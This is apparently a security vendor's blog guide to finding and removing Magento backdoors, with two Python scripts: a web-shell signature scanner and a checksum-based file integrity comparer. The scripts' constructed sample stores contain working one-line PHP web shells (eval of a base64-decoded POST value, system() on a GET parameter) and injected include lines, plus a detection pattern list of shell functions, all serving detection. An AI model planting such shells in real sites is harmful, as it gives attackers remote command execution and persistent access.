A backdoor is a way around the normal authentication of a website: a hidden path that lets an attacker get back in without a password and without exploiting anything a second time. It is usually planted after a first break-in. When the login itself is hard to compromise, the attacker looks for a weaker point elsewhere on the site, such as an outdated extension or a writable upload directory, gets in through it, and then embeds code that can later be used to re-enter the website with little or no effort. That embedded code is the backdoor.
Attackers plant backdoors because they want continued access to a site they have already compromised, even after the original vulnerability is patched. In other cases, Magento store developers deliberately leave a backdoor behind (a debug login, a hidden maintenance script) so they can get back into the system and troubleshoot bugs later. Whatever the origin, a backdoor is always a security risk, and it is always better NOT to have one in your system than to have it.
Why are Magento backdoors a menace?
A backdoor can have many negative consequences for your Magento store if it is exploited.
Over the years we have seen Magento backdoor attacks lead to the following for the e-commerce store:
- Unauthorized, persistent access for the attacker
- Theft of customer and payment data, and the resulting data breach
- Website defacement
- Server hijacking
- Use of the hijacked server in further attacks, such as DoS and DDoS attacks
- Injection of additional malware, web shells and data-stealing scripts, and so on.
A backdoor does not spread on its own the way a worm does, but an attacker who holds one can use it to drop further malware, pivot to other sites hosted on the same server, or take over the server itself.
The list of common backdoors is easily available and I won’t be listing them here. This common PHP web shell and backdoor list as given on GitHub will serve your purpose if you’re looking for common Magento backdoors.
Why is it hard to detect a backdoor?
Backdoors are very hard to detect because they disguise themselves as something legitimate and useful, which is very difficult to suspect, at least for an average store owner.
Here are some reasons why a backdoor is particularly hard to detect:
- An attacker can hide the backdoor anywhere on your website, in a file of any name and extension
- They are usually ordinary PHP code, often obfuscated (for example a base64-encoded payload passed to eval()), so they do not stand out from the rest of the site
- They reside in unconventional areas, such as upload, cache and static-asset directories, to further avoid detection
Areas to look for a backdoor in your Magento store
If you suspect the presence of a Magento backdoor in your e-commerce store, these are some of the places you should look:
- Theme & extension files: If you have inactive themes or extensions (plugins) lying around on your website, they are likely hosts for a backdoor. Outdated and inactive themes and extensions are the most vulnerable, so hackers get in through them and leave their backdoor files among them, where one more PHP file attracts no attention. Vulnerable themes and extensions are among the most common entry points for attackers.
- Core files: After theme and extension files, the next most common hiding place is the core files. More sophisticated hackers inject backdoors into the most crucial files on your website, i.e. the Magento core files, precisely because nobody expects those to change.
- Configuration files: Among the core files, the most probable place for a backdoor is the configuration files (in Magento 2, app/etc/env.php and app/etc/config.php), which are loaded on every request. Don’t forget to scan these while hunting for backdoors.
- Database: The database of an e-commerce store holds the customer data hackers so desperately want, and it can also host the backdoor itself. An admin user or API integration you did not create is a backdoor of its own, and JavaScript injected into core_config_data (for example the design/head/includes value) or into CMS blocks and pages is served to every visitor without a single file on disk changing. Check here too.
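As an added illustration of where and how to look, and not code from the original article or from Astra, here is a small Python scanner that walks a Magento document root and flags the two things this section describes: PHP files sitting in directories that should hold only uploads, caches or static assets, and files containing code patterns typical of PHP web shells. The signature list, the directory list and the sample store tree it builds are all constructed assumptions for the example; a real scan uses a far longer signature list and still needs a human to read every hit.

```python
import os
import re
import tempfile

# Heuristic signatures typical of PHP web shells (an assumed, non-exhaustive list):
# each label maps to a regex tested against the file contents.
SUSPICIOUS_PATTERNS = {
    "eval_of_decoded_payload": re.compile(
        r"\b(eval|assert)\s*\(\s*@?(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", re.I),
    "request_to_exec": re.compile(
        r"\b(system|exec|shell_exec|passthru|popen|proc_open)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b", re.I),
    "request_to_eval": re.compile(r"\b(eval|assert)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b", re.I),
    "request_as_function_name": re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\[[^\]]+\]\s*\(", re.I),
    "preg_replace_e_modifier": re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/[a-z]*e[a-z]*['\"]", re.I),
    "long_base64_blob": re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]"),
}

# Directories under a Magento 2 root that should hold uploads, caches and static
# assets only (assumed list): any .php file there is a finding on its own.
NO_PHP_DIRS = ("pub/media/", "pub/static/", "var/")


def scan_file(path, root):
    """Return the list of labels that fire for one file (empty if nothing suspicious)."""
    rel = os.path.relpath(path, root).replace(os.sep, "/")
    hits = []
    if rel.endswith(".php") and rel.startswith(NO_PHP_DIRS):
        hits.append("php_in_non_code_dir")
    try:
        with open(path, "r", encoding="utf-8", errors="ignore") as fh:
            content = fh.read()
    except OSError:
        return hits
    # Signature-match .php files and anything else that carries a PHP open tag,
    # so a shell renamed to .jpg or .txt is still inspected.
    if rel.endswith(".php") or "<?php" in content or "<?=" in content:
        for label, pattern in SUSPICIOUS_PATTERNS.items():
            if pattern.search(content):
                hits.append(label)
    return hits


def scan_tree(root):
    """Walk a document root; return {relative_path: [labels]} for every file with a hit."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            hits = scan_file(path, root)
            if hits:
                report[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return report


# Constructed sample store: three legitimate-looking files and two planted backdoors.
SAMPLE_FILES = {
    "app/code/Vendor/Module/Helper/Data.php":
        "<?php\nnamespace Vendor\\Module\\Helper;\n"
        "class Data { public function enc($s) { return base64_encode($s); } }\n",
    "app/etc/env.php": "<?php\nreturn ['backend' => ['frontName' => 'admin']];\n",
    "pub/media/wysiwyg/banner.jpg": "constructed placeholder, not a real image\n",
    # Backdoor 1: dropped into the media (upload) directory under an innocent name.
    "pub/media/wysiwyg/cache.php": "<?php @eval(base64_decode($_POST['c'])); ?>\n",
    # Backdoor 2: hidden inside a plausibly named module controller.
    "app/code/Vendor/Module/Controller/Index/Warmup.php":
        "<?php\nif (isset($_GET['cmd'])) { system($_GET['cmd']); }\n",
}


def build_sample_store():
    """Write SAMPLE_FILES into a fresh temporary directory and return its path."""
    root = tempfile.mkdtemp(prefix="magento_scan_")
    for rel, body in SAMPLE_FILES.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    store = build_sample_store()
    for rel, labels in sorted(scan_tree(store).items()):
        print(f"{rel}: {', '.join(labels)}")
```

Point scan_tree() at a real document root instead of the sample store to use it. Expect false positives from legitimate code that decodes base64 or builds function names dynamically; the value of the scan is the short list of files to read by hand, not a verdict.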
After you have found one backdoor, the next wise step is a complete scan to remove all backdoors from your website, since attackers rarely leave only one.
But in case you couldn’t find the malware (and let’s admit it, locating a backdoor is not easy), get professionals to find and remove it for you. Astra Security’s immediate malware & backdoor removal service offers complete and quick recovery from malware & backdoor infections.
How to remove a Magento backdoor?
Removing the backdoor is the next thing to do after cleaning your website of the malware it delivered; if the backdoor stays, the malware comes back.
1. Comparing checksums
In this technique, the website after the hack is compared against a backup of the website taken before the hack (or a clean copy of the same Magento version). Every file is checksummed on both sides, and any file whose checksum differs, or that exists on only one side, is a candidate for infection. The checksum only finds the changed files; you still have to inspect each one and remove it or restore the clean version.
2. Scanning for unknown files
There are cases where a backdoor is so well placed and hidden that it is almost impossible to spot by reading code. So, go through all the files and directories of your website to see whether anything is missing or something extra is embedded: PHP files in upload, cache or static directories, files with odd names (a leading dot, a double extension) or with a recent modification time in an otherwise untouched tree.
3. Block the bad code
Add rules to your firewall or WAF that block requests to the backdoor’s path and requests matching known web-shell patterns, so that a backdoor you have missed cannot be used while you keep hunting. It is better to be safe than sorry.
4. Core Files Integrity
Verify the integrity of the core files of your website against a clean copy of the same version. If anything has been modified or altered, replace the affected files with fresh copies, or reinstall the Magento core and restore only your own code and configuration on top of it.
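The three file-based steps above (checksum comparison, scanning for unknown files, core-file integrity) are really one procedure: hash every file in a known-good copy and in the live site, then list what was added, removed or modified. The Python script below is an added example, not the article’s or Magento’s own tooling. The two directory trees it compares are constructed inline to stand in for a clean backup and the hacked site, and the list of directories that legitimately differ between the two is an assumption you would adjust for your deployment.

```python
import hashlib
import os
import tempfile


def hash_tree(root):
    """Map every file under root (relative POSIX path) to its SHA-256 hex digest."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            h = hashlib.sha256()
            with open(path, "rb") as fh:
                for chunk in iter(lambda: fh.read(65536), b""):
                    h.update(chunk)
            digests[rel] = h.hexdigest()
    return digests


# Paths that legitimately differ between a clean reference and a live store
# (generated code, caches, logs, uploads). Assumed list; executable PHP under
# these paths is never ignored, because that is exactly where shells get dropped.
IGNORED_PREFIXES = ("var/", "generated/", "pub/static/", "pub/media/")


def compare_trees(reference_root, live_root):
    """Return added / removed / modified file lists, live site relative to the reference."""
    ref = hash_tree(reference_root)
    live = hash_tree(live_root)

    def relevant(rel):
        return rel.endswith(".php") or not rel.startswith(IGNORED_PREFIXES)

    return {
        "added": sorted(p for p in live if p not in ref and relevant(p)),
        "removed": sorted(p for p in ref if p not in live and relevant(p)),
        "modified": sorted(p for p in live if p in ref and live[p] != ref[p] and relevant(p)),
    }


# Constructed trees: a clean backup and the same site after a compromise.
CLEAN_TREE = {
    "index.php": "<?php\nrequire __DIR__ . '/app/bootstrap.php';\n",
    "pub/.htaccess": "Options -Indexes\n",
    "app/etc/env.php": "<?php\nreturn ['backend' => ['frontName' => 'admin']];\n",
    "vendor/magento/framework/App/Http.php":
        "<?php\nnamespace Magento\\Framework\\App;\nclass Http {}\n",
    "var/log/system.log": "",
    "pub/media/logo.png": "constructed placeholder, not a real image\n",
}

INFECTED_TREE = dict(CLEAN_TREE)
# Core file altered: an include appended to a framework class.
INFECTED_TREE["vendor/magento/framework/App/Http.php"] += "include_once '/tmp/.x';\n"
# Configuration file altered in the same way.
INFECTED_TREE["app/etc/env.php"] += "@include '/var/tmp/.sess';\n"
# Web shell dropped into the upload directory under a dotfile name.
INFECTED_TREE["pub/media/wysiwyg/.cache.php"] = "<?php eval(base64_decode($_POST['c']));\n"
# Protective .htaccess removed by the attacker.
del INFECTED_TREE["pub/.htaccess"]
# Legitimate day-to-day differences that must not be reported.
INFECTED_TREE["var/log/system.log"] = "main.INFO: cache flushed\n"
INFECTED_TREE["pub/media/new-upload.jpg"] = "constructed placeholder, not a real image\n"


def write_tree(files):
    """Write a {relative_path: content} mapping into a new temp dir; return its path."""
    root = tempfile.mkdtemp(prefix="magento_integrity_")
    for rel, body in files.items():
        full = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(full), exist_ok=True)
        with open(full, "w", encoding="utf-8") as fh:
            fh.write(body)
    return root


if __name__ == "__main__":
    diff = compare_trees(write_tree(CLEAN_TREE), write_tree(INFECTED_TREE))
    for kind in ("added", "removed", "modified"):
        for rel in diff[kind]:
            print(f"{kind:9s} {rel}")
```

Use your own pre-hack backup as the reference when you have one: it already contains your env.php, custom modules and themes, so every difference is suspect. Against a fresh download of the same Magento version, configuration and custom code will differ legitimately and only the vendor/ and core entries of the "modified" list are directly actionable.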
How to prepare against a Magento backdoor hack?
You have successfully removed a backdoor from your website. But what can you do to stop it from coming back? Here are some tips:
- Reset all passwords: admin, database, FTP/SSH, and any API or integration keys.
- Re-check your admin accounts and integrations, and remove any you do not recognise.
- Use a firewall (WAF) in front of the store.
- Always keep a clean, offline backup of your website.
- Regularly update Magento and apply its security patches.
- Use a supported, up-to-date version of PHP.
- Install extensions only from trusted sources, keep them updated, and remove the ones you do not use.
- Limit login attempts to the admin panel.
A Magento backdoor is a menace to your store, but it can be found and eradicated. Most importantly, there is no such thing as a good backdoor: all backdoors pose a security threat, including the ones left in for convenience, and should be handled very carefully. If you are struggling to find backdoors in your Magento store, follow the steps given in this guide to find and remove them. Overall, having a security system and malware scanner that scans your Magento store for malware & backdoors at regular intervals can be helpful.